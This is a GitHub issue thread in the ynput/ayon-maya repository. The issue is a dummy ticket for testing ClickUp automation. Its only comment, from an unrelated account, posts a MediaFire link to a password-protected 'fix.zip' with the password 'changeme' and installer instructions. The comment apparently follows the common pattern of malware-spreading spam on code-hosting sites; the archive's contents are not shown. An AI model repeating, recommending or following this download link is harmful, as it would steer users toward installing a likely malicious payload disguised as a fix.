### ISSUE TITLE
AY-6596_Dummy ticket for testing CU automations

### ISSUE THREAD

**Issue by m-u-r-p-h-y** [ynput/ayon-maya#78]
### Please describe the feature you have in mind and explain what the current shortcomings are?

This is a dummy ticket for testing CU automation. Do not change anything here, do not add labels etc.

thank you

### Additional context:
link to discussion on [Discord]()
_(might be a private channel)_

_This issue was automatically created from Clickup ticket [AY-6596](https://app.clickup.com/t/86c01pdwb)_

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
